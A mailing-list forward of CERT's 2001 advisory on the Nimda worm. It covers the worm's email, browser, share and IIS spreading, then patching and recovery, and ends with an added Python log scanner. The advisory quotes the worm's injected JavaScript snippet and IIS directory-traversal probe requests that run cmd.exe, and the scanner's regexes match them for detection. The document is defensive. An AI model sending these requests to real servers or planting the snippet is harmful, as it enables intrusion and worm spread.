
[cobalt-users] Fw: CERT Advisory CA-2001-26 Nimda Worm



>
> CERT Advisory CA-2001-26 Nimda Worm
>
>    Original release date: September 18, 2001
>    Source: CERT/CC
>
>    A complete revision history is at the end of this file.
>
> Systems Affected
>
>      * Systems running Microsoft Windows 95, 98, ME, NT, and 2000
>
> Overview
>
>    The  CERT/CC  has  received reports of new malicious code known as the
>    "W32/Nimda  worm"  or  the  "Concept  Virus  (CV)  v.5." This new worm
>    appears to spread by multiple mechanisms:
>
>      * from client to client via email
>
>      * from client to client via open network shares
>
>      * from web server to client via browsing of compromised web sites
>
>      * from client to web server via active scanning for and exploitation
>        of the "Microsoft IIS 4.0 / 5.0 directory traversal" vulnerability
>        (VU #111677)
>
>      * from  client  to  web  server via scanning for the back doors left
>        behind  by  the  "Code  Red  II"  (IN-2001-09),  and "sadmind/IIS"
>        (CA-2001-11) worms
>
>    Initial  analysis  indicates  that  the  worm  contains no destructive
>    payload  beyond  modification  of  web  content  to facilitate its own
>    propagation.
>
>    We  are  also  receiving  reports  of denial of service as a result of
>    network scanning and email propagation.
>
> I. Description
>
>    The  Nimda  worm  has  the  potential to affect both user workstations
>    (clients)  running Windows 95, 98, ME, NT, or 2000 and servers running
>    Windows NT and 2000.
>
>    Email Propagation
>
>    This    worm   propagates   through   email   arriving   as   a   MIME
>    "multipart/alternative"  message consisting of two sections. The first
>    section  is defined as MIME type "text/html", but it contains no text,
>    so the email appears to have no content. The second section is defined
>    as   MIME   type  "audio/x-wav",  but  it  contains  a  base64-encoded
>    attachment named "readme.exe", which is a binary executable.
>
>    Due to a vulnerability described in CA-2001-06 (Automatic Execution of
>    Embedded  MIME  Types),  any  mail software running on an x86 platform
>    that  uses  Microsoft  Internet Explorer 5.5 SP1 or earlier (except IE
>    5.01  SP2)  to  render  the  HTML mail automatically runs the enclosed
>    attachment and, as a result, infects the machine with the worm. Thus, in
>    vulnerable  configurations,  the  worm  payload  will automatically be
>    triggered  by  simply opening (or previewing) this mail message. As an
>    executable binary, the payload can also be triggered by simply running
>    the attachment.
>
>    The  email  message delivering the Nimda worm appears to also have the
>    following characteristics:
>
>      * The  text  in  the  subject line of the mail message appears to be
>        variable,  but  those  seen  to  date have been over 80 characters
>        long.
>
>      * There  appear  to  be  many slight variations in the attached binary
>        file,  causing  the MD5 checksum to be different when one compares
>        different  attachments from different email messages. However, the
>        file  length  of  the  attachment appears to consistently be 57344
>        bytes.
>
>    Payload
>
>    Infected  client machines attempt to send copies of the Nimda worm via
>    email to all addresses found in the Windows address book.
>
>    Likewise,  the  client  machines  begin  scanning  for  vulnerable IIS
>    servers.  Nimda  looks  for backdoors left by previous IIS worms: Code
>    Red  II  [IN-2001-09]  and  sadmind/IIS  worm  [CA-2001-11].  It  also
>    attempts  to  exploit  the  IIS  Directory Traversal vulnerability (VU
>    #111677). The selection of potential target IP addresses follows these
>    rough probabilities:
>
>      * 50% of the time, an address with the same first two octets will be
>        chosen
>
>      * 25%  of  the  time,  an  address with the same first octet will be
>        chosen
>
>      * 25% of the time, a random address will be chosen
>
>    The  infected client machine transfers a copy of the Nimda code to any
>    server  that  it scans and finds to be vulnerable. Once running on the
>    server  machine,  the  worm  traverses  each  directory  in the system
>    (including  all  those  accessible  through file shares) and writes a
>    copy  of  itself to disk using the name "README.EML". When a directory
>    containing  web  content  (e.g.,  HTML  or  ASP  files)  is found, the
>    following snippet of JavaScript code is appended to every one of these
>    web-related files:
>
>    <script language="JavaScript">
>    window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
>    </script>
>
>    This  modification  of  web  content allows further propagation of the
>    worm  to  new  clients through a browser or browsing of a network file
>    system.
>
>    Browser Propagation
>
>    As  part  of  the  infection  process, the Nimda worm modifies all web
>    content  files  it  finds  (including,  but not limited to, files with
>    .htm,  .html, and .asp extensions). As a result, any user browsing web
>    content  on  the  system,  whether  via  the  file system or via a web
>    server,   may   download  a  copy  of  the  worm.  Some  browsers  may
>    automatically  execute  the  downloaded  copy,  thereby  infecting the
>    browsing system.
>
>    File System Propagation
>
>    The  Nimda  worm  creates  numerous  copies  of itself (using the name
>    README.EML)  in  all  writable directories (including those found on a
>    network  share)  to  which  the  user has access. If a user on another
>    system  subsequently  selects  the copy of the worm file on the shared
>    network drive in Windows Explorer with the preview option enabled, the
>    worm may be able to compromise that system.
>
>    System Footprint
>
>    The  scanning  activity  of  the Nimda worm produces the following log
>    entries for any web server listening on port 80/tcp:
>
>    GET /scripts/root.exe?/c+dir
>    GET /MSADC/root.exe?/c+dir
>    GET /c/winnt/system32/cmd.exe?/c+dir
>    GET /d/winnt/system32/cmd.exe?/c+dir
>    GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
>    GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
>    GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
>    GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
>    GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
>    GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
>    GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
>    GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
>    GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
>    GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
>    GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
>    GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
>
>    Note:  The  first four entries in these sample logs denote attempts to
>    connect  to  the backdoor left by Code Red II, while the remaining log
>    entries  are  examples of exploit attempts for the Directory Traversal
>    vulnerability.
>
> II. Impact
>
>    Intruders  can  execute  arbitrary  commands  within  the  LocalSystem
>    security  context  on  machines running the unpatched versions of IIS.
>    Hosts that have been compromised are also at high risk for being party
>    to attacks on other Internet sites.
>
>    The  high  scanning  rate  of  the Nimda worm may also cause bandwidth
>    denial-of-service conditions on networks with infected machines.
>
> III. Solutions
>
>    Recommendations for System Administrators of IIS machines
>
>    To  determine  if  your  system  has  been  compromised,  look for the
>    following:
>
>      * root.exe  artifact  (indicates  a  compromise  by  Code  Red II or
>        sadmind/IIS worms making the system vulnerable to the Nimda worm)
>
>      * admin.dll  artifact  or  unexpected  .eml files in the directories
>        with web content (indicates compromise by the Nimda worm)
>
>    The  only  safe way to recover from the system compromise is to format
>    the  system  drive(s)  and  reinstall the system software from trusted
>    media  (such  as  vendor-supplied  CD-ROM).  Additionally,  after  the
>    software  is reinstalled, all vendor-supplied security patches must be
>    applied.  The  recommended  time to do this is while the system is not
>    connected  to  any  network.  However,  if sufficient care is taken to
>    disable   all  server  network  services,  then  the  patches  can  be
>    downloaded from the Internet.
>
>    Detailed  instructions  for recovering your system can be found in the
>    CERT/CC tech tip:
>
>           Steps for Recovering from a UNIX or NT System Compromise
>           http://www.cert.org/tech_tips/win-UNIX-system_compromise.html
>
>    Apply the appropriate patch from your vendor
>
>    A   cumulative   patch   which   addresses   all  of  the  IIS-related
>    vulnerabilities   exploited  by  the  Nimda  worm  is  available  from
>    Microsoft at
>
>           http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
>
>    Recommendations for End User Systems
>
>    Apply the appropriate patch from your vendor
>
>    If you are running a vulnerable version of Internet Explorer (IE), the
>    CERT/CC  recommends  applying  the  patch for the "Automatic Execution of
>    Embedded MIME Types" vulnerability available from Microsoft at
>
>           http://www.microsoft.com/technet/security/bulletin/MS01-020.asp
>
>    Run and Maintain an Anti-Virus Product
>
>    It  is  important  for users to update their anti-virus software. Most
>    anti-virus  software vendors have released updated information, tools,
>    or  virus  databases  to  help  detect and partially recover from this
>    malicious  code.  A list of vendor-specific anti-virus information can
>    be found in Appendix A.
>
>    Many   anti-virus   packages   support   automatic  updates  of  virus
>    definitions.   We   recommend   using  these  automatic  updates  when
>    available.
>
>    Don't open e-mail attachments
>
>    The  Nimda  worm may arrive as an email attachment named "readme.exe".
>    Users should not open this attachment.
>
>    Disable JavaScript
>
>    End-user systems can become infected with the Nimda worm by browsing web
>    sites hosted by infected servers. This method of infection requires the
>    use of JavaScript to be successful. Therefore, the CERT/CC recommends that
>    end user systems disable JavaScript.
>
> Appendix A. Vendor Information
>
>    Antivirus Vendor Information
>
>    Central Command, Inc.
>
>           http://support.centralcommand.com/cgi-bin/command.cfg/php/enduser/std_adp.php?p_refno=010918-000005
>
>    Command Software Systems
>
>           http://www.commandsoftware.com/virus/nimda.html
>
>    Data Fellows Corp
>
>           http://www.datafellows.com/v-descs/nimda.shtml
>
>    McAfee
>
>           http://vil.mcafee.com/dispVirus.asp?virus_k=99209&;
>
>    Sophos
>
>           http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
>
>    Symantec
>
>           http://www.symantec.com/avcenter/venc/data/w32.nimda.a@xxxxxxx
>
>    Trend Micro
>
>           http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
>
>           http://www.antivirus.com/pc-cillin/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
>
>    You  may  wish  to  visit  the CERT/CC's computer virus resources page
>    located at
>
>      http://www.cert.org/other_sources/viruses.html
>
> References
>
>    Authors:   Roman  Danyliw,  Chad  Dougherty,  Allen Householder, Robin
>    Ruefle
>    ______________________________________________________________________
>
>    This document is available from:
>    http://www.cert.org/body/advisories/CA200126_FA200126.html
>    ______________________________________________________________________
>
> CERT/CC Contact Information
>
>    Email: cert@xxxxxxxx
>           Phone: +1 412-268-7090 (24-hour hotline)
>           Fax: +1 412-268-6989
>           Postal address:
>           CERT Coordination Center
>           Software Engineering Institute
>           Carnegie Mellon University
>           Pittsburgh PA 15213-3890
>           U.S.A.
>
>    CERT  personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
>    Monday  through  Friday; they are on call for emergencies during other
>    hours, on U.S. holidays, and on weekends.
>
> Using encryption
>
>    We  strongly  urge you to encrypt sensitive information sent by email.
>    Our public PGP key is available from
>
>    http://www.cert.org/CERT_PGP.key
>
>    If  you  prefer  to  use  DES,  please  call the CERT hotline for more
>    information.
>
> Getting security information
>
>    CERT  publications  and  other security information are available from
>    our web site
>
>    http://www.cert.org/
>
>    To  be  added  to  our mailing list for advisories and bulletins, send
>    email   to   cert-advisory-request@xxxxxxxx   and   include  SUBSCRIBE
>    your-email-address in the subject of your message.
>
>    *  "CERT"  and  "CERT  Coordination Center" are registered in the U.S.
>    Patent and Trademark Office.
>    ______________________________________________________________________
>
>    NO WARRANTY
>    Any  material furnished by Carnegie Mellon University and the Software
>    Engineering  Institute  is  furnished  on  an  "as is" basis. Carnegie
>    Mellon University makes no warranties of any kind, either expressed or
>    implied  as  to  any matter including, but not limited to, warranty of
>    fitness  for  a  particular purpose or merchantability, exclusivity or
>    results  obtained from use of the material. Carnegie Mellon University
>    does  not  make  any warranty of any kind with respect to freedom from
>    patent, trademark, or copyright infringement.
>      _________________________________________________________________
>
>    Conditions for use, disclaimers, and sponsorship information
>
>    Copyright 2001 Carnegie Mellon University.
>
>    Revision History
>
>    September 18, 2001: Initial Release
>
>
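The System Footprint section lists the request paths the worm leaves in web server logs, and its note separates the first four (Code Red II backdoor probes) from the directory traversal attempts. The Python below is an added example, not part of the advisory or of this mailing-list post: it applies that distinction to Common Log Format lines and reports which probes the server answered with 200. The sample log lines are constructed, and the percent-encoded form of the overlong UTF-8 sequences is an assumption about how a real log would record them.

```python
import re
from typing import List, Optional, Tuple

# Common Log Format: client ident user [time] "METHOD target HTTP/x" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Backdoor probes (the advisory's first four entries): root.exe left by Code
# Red II, or cmd.exe reached through a /c or /d virtual root.
BACKDOOR = re.compile(r'/root\.exe$|^/[cd]/winnt/system32/cmd\.exe$', re.I)

# Traversal probes: ".." followed by a separator IIS decodes after its path
# check (%5c, %2f, double-encoded %35c, overlong UTF-8 %c0%af, %c1%1c, %c1%9c,
# or a literal backslash as the advisory prints it) on the way to cmd.exe.
TRAVERSAL = re.compile(r'\.\.(?:%[0-9a-f]{2}|\\|/).*cmd\.exe', re.I)

# Constructed sample lines (not from the advisory); a real log carries the
# overlong UTF-8 bytes percent-encoded, as assumed on the fourth line.
SAMPLE_LOG = """\
10.0.0.7 - - [18/Sep/2001:10:02:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 -
10.0.0.7 - - [18/Sep/2001:10:02:12 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
10.0.0.7 - - [18/Sep/2001:10:02:13 -0400] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 -
10.0.0.7 - - [18/Sep/2001:10:02:14 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
192.0.2.5 - - [18/Sep/2001:10:02:15 -0400] "GET /index.html HTTP/1.0" 200 1024
"""

def classify_request(path: str) -> Optional[str]:
    """Return 'backdoor', 'traversal' or None for one request path (query removed)."""
    if BACKDOOR.search(path):
        return "backdoor"
    if TRAVERSAL.search(path):
        return "traversal"
    return None

def scan_log(text: str) -> List[Tuple[str, str, str, int]]:
    """Return (client, category, path, status) for each line that is a Nimda probe."""
    hits = []
    for line in text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        path = target.split("?", 1)[0]  # drop the "?/c+dir" command argument
        category = classify_request(path)
        if method == "GET" and category:
            hits.append((client, category, path, int(status)))
    return hits

def successful_probes(text: str) -> List[Tuple[str, str, str, int]]:
    """Probes answered 200: the server ran cmd.exe, so treat the host as compromised."""
    return [hit for hit in scan_log(text) if hit[3] == 200]
```

A 404 on these paths means the probe was refused; a 200 is the signal to start the recovery steps in Section III rather than just block the source address.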